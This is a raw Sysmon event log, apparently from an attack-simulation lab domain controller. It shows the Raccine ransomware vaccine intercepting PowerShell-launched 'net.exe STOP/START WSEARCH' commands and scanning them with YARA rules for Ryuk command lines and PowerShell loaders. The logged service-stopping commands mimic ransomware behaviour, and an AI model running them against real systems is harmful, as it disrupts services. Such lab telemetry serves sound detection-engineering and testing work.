Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247392Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.890{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.885{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247375Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.876{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002247309Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.830{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247308Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.828{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5584-61B2-0A09-010000000E02}7960C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002247307Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.825{9DBE88B5-5584-61B2-0909-010000000E02}7336ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBCFD.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247305Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.819{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5584-61B2-0A09-010000000E02}7960C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247300Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.818{9DBE88B5-5584-61B2-0909-010000000E02}73364864C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5584-61B2-0A09-010000000E02}7960C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002247299Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.818{9DBE88B5-5584-61B2-0A09-010000000E02}7960C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" START WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002247298Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.811{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247293Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.808{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002247292Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.808{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002247291Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:14:12.807{9DBE88B5-5584-61B2-0909-010000000E02}7336C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002247054Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:59.376{9DBE88B5-5575-61B2-EC08-010000000E02}4380ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmpMD5=4708311A8B9ACD3CFC9475922E233332,SHA256=0DC7E591BF694FB2C7DFA9D8F3C8D08FD25017EBCC0C4229D84C59C894B95564,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247001Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:58.014{9DBE88B5-5575-61B2-0409-010000000E02}56485644C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246998Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:58.002{9DBE88B5-5575-61B2-0509-010000000E02}54686040C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-0409-010000000E02}5648C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246992Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.991{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-0409-010000000E02}5648C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246991Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.991{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-0409-010000000E02}5648C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246990Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.991{9DBE88B5-5575-61B2-0409-010000000E02}5648C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246987Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.975{9DBE88B5-5575-61B2-0309-010000000E02}71804692C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-0209-010000000E02}6148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246981Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.964{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-0209-010000000E02}6148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246980Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.963{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-0209-010000000E02}6148C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246979Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.964{9DBE88B5-5575-61B2-0209-010000000E02}6148C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246976Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.948{9DBE88B5-5575-61B2-0109-010000000E02}34927672C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-0009-010000000E02}7772C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246970Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.937{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-0009-010000000E02}7772C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246969Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.937{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-0009-010000000E02}7772C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246968Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.937{9DBE88B5-5575-61B2-0009-010000000E02}7772C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5575-61B2-EC08-010000000E02}4380C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002246965Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.921{9DBE88B5-5575-61B2-FF08-010000000E02}66081108C:\Windows\system32\conhost.exe{9DBE88B5-5575-61B2-FE08-010000000E02}8156C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246959Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.910{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5575-61B2-FE08-010000000E02}8156C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002246958Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.909{9DBE88B5-5575-61B2-EC08-010000000E02}43806160C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5575-61B2-FE08-010000000E02}8156C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002246957Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:57.910{9DBE88B5-5575-61B2-FE08-010000000E02}8156C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac811D.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" 